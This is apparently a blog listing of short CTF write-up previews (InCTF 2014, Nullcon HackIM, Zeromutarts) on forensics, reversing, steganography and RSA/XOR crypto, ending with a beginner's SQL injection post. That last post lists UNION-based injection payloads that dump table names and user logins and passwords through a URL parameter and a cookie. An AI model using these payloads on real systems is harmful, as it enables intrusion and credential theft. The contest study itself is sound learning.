Posts

Showing posts with the label CTF

InCTF 2014 - Forensics-8 300

Given a partition needed to mount and get the flag. root@Vijay:~/Desktop/inctf 14/forensics# file Forensics-8 Forensics-8: x86 boot sector; partition 1: ID=0xc, starthead 0, startsector 1, 97656 sectors, code offset 0xb8 root@Vijay:~/Desktop/inctf 14/forensics# root@Vijay:~/Desktop/inctf 14/forensics# root@Vijay:~/Desktop/inctf 14/forensics# root@Vijay:~/Desktop/inctf 14/forensics# gparted Forensics-8 ====================== libparted : 2.3 ====================== root@Vijay:~/Desktop/inctf 14/forensics# parted Forensics-8 GNU Parted 2.3 Using /root/Desktop/inctf 14/forensics/Forensics-8 Welcome to GNU Parted! Type 'help' to view a list of commands. (parted) unit                                                             Unit?  [compact]? B                       ...

InCTF 2014 - Reverse 50

1. First Challenge was given python compiled File Used Python decompiler to get the original code. root@Vijay:~/Desktop/inctf 14/reverse# file one one: python 2.7 byte-compiled I got the printable sequence array values. eflag = [131, ... 138, ... 219, ... 198, ... 201, ... 158, ... 151, ... 154, ... 134, ... 129, ... 128, ... 177, ... 135, ... 157, ... 177, ... 157, ... 154, ... 135, ... 130, ... 130, ... 177, ... 141, ... 129, ... 129, ... 130, ... 201, ... 199] >>> eflag [131, 138, 219, 198, 201, 158, 151, 154, 134, 129, 128, 177, 135, 157, 177, 157, 154, 135, 130, 130, 177, 141, 129, 129, 130, 201, 199] >>> >>> flag = ''.join(map(chr, map(lambda x: x ^ 238, eflag))) >>> >>> print flag md5('python_is_still_cool') Next is the compiled java class file, I used jad decompiler to get the original class file root@Vijay:~/Desktop/inctf 14/reverse# file two.class two.class: compiled Java...

InCTF 2014 - Reverse 100

Hi this is my first reverse engineering with GDB. Challenge was to get the flag from the display_function. First we should disassemble the executable file with objdump to see how the program control works. root@Vijay:~/Desktop/inctf 14/reverse# objdump -d four four: file format elf32-i386 Disassembly of section .init: 080482f4 : 80482f4: 53 push %ebx 80482f5: 83 ec 08 sub $0x8,%esp 80482f8: e8 b3 00 00 00 call 80483b0 80482fd: 81 c3 03 1d 00 00 add $0x1d03,%ebx 8048303: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 8048309: 85 c0 test %eax,%eax 804830b: 74 05 je 8048312 804830d: e8 3e 00 00 00 call 8048350 8048312: 83 c4 08 add $0x8,%esp 8048315: 5b pop %ebx 8048316: c3 ret Disassembly of section .plt: 08048320 : 8048320: ff 35 04 a0 04 08 pushl 0x804a004 8048326: ff 25 08 a0 04 08 jmp ...

InCTF 2014 - Stegnography 400

Give an image, the flag is hidden in the Blue plane. import os,sys import Image modi_bin = Image.open("modi.png").convert('RGB') bin = '' R = open('r.txt','w') G = open('g.txt','w') B = open('b.txt','w') # By Analysing the text docs I found blue Plane First column is embedded with data flag = '' flag1 = '' for h in range(modi_bin.size[1]): # Fetches Height count = 0 binR = '' binG = '' binB = '' for w in range(modi_bin.size[0]): # Fetches Width count += 1 binR += str(modi_bin.getpixel((w,h))[0] & 1) binG += str(modi_bin.getpixel((w,h))[1] & 1) binB += str(modi_bin.getpixel((w,h))[2] & 1) if w == 0: # blue plane first bit flag += str(modi_bin.getpixel((w,h))[2] & 1) if count == 8: R.write(binR) G.write(binG) B.write(binB) binR=' ';binG=' ';binB=' ' count = 0 R.write(binR+'\n') G....

InCTF 2014 - Crypto 300

This is also a RSA challenge which is more interesting, given a RSA-704 bit. Factors are found in the wiki. I used openssl to finish, this challenge. root@Vijay:# openssl rsa -inform PEM -text -pubin -in publickey.pem -modulus Public-Key: (704 bit) Modulus: 00:e1:34:18:93:fe:6e:68:16:ce:c8:a9:70:a3:9c: 00:fa:54:7c:7d:a2:cd:ed:ab:0a:62:b9:1c:46:51: a8:3f:96:38:0b:cf:ae:e2:6f:7e:86:61:07:90:63: 89:42:1b:1e:68:d0:a1:7a:ad:c9:87:0b:98:58:e9: 56:28:6e:39:99:e9:8c:ec:98:81:53:4a:c7:72:ae: 78:f5:e8:ab:a1:e2:f8:d3:03:95:77:02:9d:87 Exponent: 65537 (0x10001) Modulus=E1341893FE6E6816CEC8A970A39C00FA547C7DA2CDEDAB0A62B91C4651A83F96380BCFAEE26F7E866107906389421B1E68D0A17AADC9870B9858E956286E3999E98CEC9881534AC772AE78F5E8ABA1E2F8D3039577029D87 writing RSA key -----BEGIN PUBLIC KEY----- MHQwDQYJKoZIhvcNAQEBBQADYwAwYAJZAOE0GJP+bmgWzsipcKOcAPpUfH2ize2r CmK5HEZRqD+WOAvPruJvfoZhB5BjiUIbHmjQoXqtyYcLmFjpVihuOZnpjOyYgVNK x3KuePXoq6Hi+NMDlXcCnYcCAwEAAQ== -----END PUBLIC KEY-...

InCTF 2014 - Crypto 200

This challenge had made me mad, Some how I finally I managed to solve the challenge. This is a RSA Crypto, given a cipher and public key. This is RSA low public exponent attack, e=3. root@Vijay:# openssl rsa -pubin -in pub.pem -text -noout -modulus Public-Key: (4096 bit) Modulus: 00:d1:0b:a0:e9:cd:6d:d6:c3:89:5f:cd:f4:17:db: 21:e5:81:22:60:89:c6:c7:58:7f:c4:1b:3d:78:df: f5:2c:0f:8c:29:dc:6b:e9:fc:cf:31:68:32:e6:ff: 6f:f0:49:6e:9e:56:6e:cb:c1:31:06:4e:b8:47:5d: 6c:1b:c8:28:be:4a:f4:54:ad:62:cb:f0:d1:d2:cd: 5a:59:8a:24:1c:52:b1:6d:8e:e1:da:0c:a9:cc:56: 30:3c:d0:70:71:0e:6c:18:1f:2a:31:c6:88:7e:52: cf:14:bd:76:f6:25:80:a8:46:92:f8:81:98:a9:38: 49:0f:b2:de:19:41:b1:10:85:83:3d:ed:ca:16:67: 3f:4a:e5:4b:e6:0f:e0:da:66:24:a5:3d:b2:32:dc: a6:c5:88:7d:72:3c:77:39:c4:76:ef:30:60:19:a0: 57:f1:c6:be:37:a5:b8:20:d0:91:9a:cf:fd:18:63: d2:2c:6f:a7:30:fe:12:e8:15:35:9d:68:a4:ec:e1: c0:1e:f7:b0:ec:d9:59:91:b3:d9:71:d0:09:27:99: 5e:d6:6e:d...

InCTF 2014 - Crypto 100

There are three files, one.txt, one.txt.enc and second.txt.enc. Challenge is to decrypt the second.txt.enc using the key. So we got a message + cipher, so we got a hint that operation done using XOR. So XORing (Message ^ Cipher) = Key. #!/usr/bin/env python import hashlib """ one.txt This sentence is encrypted using XOR cipher. """ plain_text = open('one.txt','r').read().strip() """ one.txt.enc LAcbGEUKHQEGDgsaHU8bGEUcFgwAEhUNHQtSHhYQFghSMyorWAwbGw0cCkE= """ cipher_text = open('one.txt.enc','r').read().decode("base64") print plain_text print '---------------------------------------------------------------------' print cipher_text print '---------------------------------------------------------------------' plain_text = [ord(i) for i in plain_text] cipher_text = [ord(i) for i in cipher_text] key = '' for i in range(len(plain_text)): c = ((plain...

InCTF 2014 - Crypto 50

Question: Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd ozmtfztv. Gsv pvb uli gsrh ovevo rh svyivd. Given Hint: The Atbash cipher is a very common, simple cipher. It was for the Hebrew alphabet, but modified here to work with the English alphabet. Basically, when encoded, an "A" becomes a "Z", "B" turns into "Y", etc. The Atbash cipher can be implemented as an Affine cipher by setting both "a" and "b" to 25. We used online  tool http://rumkin.com/tools/cipher/atbash.php  to decrypt the encoded message. This is your encoded/decoded text: Atbash   cipher was originally developed for the Hebrew language. The key for this level is hebrew.

Nullcon HackIM 2014 - Programming 100 Writeup

''' Well I am a beginner. netcat 23.23.190.204 2002 Welcome Enter 20 spam words to authenticate yourself. 01/20: spam 02/20: maps 03/20: hot Authenticate failed. hot(125) is not a palprime. (Hint) Tried with different test cases and found the value for each alphabet. Since in the challenge only lower-case should be used (condition). so I written a big program ( Once again I am a beginner, to find the palprime words available in dictionary. For the words list I downloaded the dataset from infochimps.com Thank you !!! ''' #!/usr/bin/python import string import sys,math import random my_dict ={} a =1 s = 361 t = 762 - s - a n = 196 b = 405 - a -t c = 410 - a - t d =213 - a - n e = 426 - a -t f = 437 -a -t g = 306 - 1 -256 i = 442 - s h = 506 - i - s j = 525 - e -t k = 627 -i -t -e l = 738 -i -g -h -t p = 256 m = 169 o = 274 - g u = 833 - 2*n q = 1211 - u -i -t r = 918 -i -g -h -t v = 885 -a -t w = 651 -i -d -e x = 962 -e -s y = 1587 -e -s -x z = 103...

rivest-shamir-adleman-250 writeup (Zeromutarts.de 2013)

## using SAGE RSA n = 80646413 p = floor(sqrt(80646413)) ### Finding Factor p*q = n while(true): if (n%p == 0): print p break p=p+1 q = n / p print q #### phi(n) n1 = (p-1) * (q-1) print n1 e =5 d = e^-1 % n1 print d ### got private key ###Fast Exponentiation Algorithms def expo(c,d,n): if (d==1): return c%n if (d==2): return c*c % n if (d%2==0): return expo(expo(c,d/2,n),2,n) else: return c*expo(expo(c,(d-1)/2,n),2,n) cipher = [72895864,15633602,38820479,60303684,7458706,60299530,20682371,54642689,26066811,32615038,35349196,76400140,38820479,56463813,80491201,76400140,35349196,69567074,26066811,76400140,74270178,76127647,76127647,15633602,76400140,60303684,38820479,56463813,60303684,76400140,72844764,76127647,69302434,15633602,80491201,76400140,6809712,26066811,76400140,42498798,60299530,76127647,69302434,80491201,33234011] flag = '' for c in cipher: flag = flag+ chr(ex...

SQL injection My First Try

Image
id=4  UNION ALL SELECT 1,2,3 id=4  UNION ALL SELECT 1,table_name,3 from information_schema.tables id=4  UNION ALL SELECT 1,column_name,3 from information_schema.columns id=4  UNION ALL SELECT 1,username,password from users Another is by COOKIES in PHP <query> = '$username' ' UNION ALL SELECT 1,2;# ' UNION ALL SELECT table_name,3 from information_schema.tables;# ' UNION ALL SELECT column_name,1 from information_schema.columns;# ' UNION ALL SELECT login, password from users;# i BASE64 convertor http://www.base64decode.org/ TAMPER DATA in MOZILA browser to inject it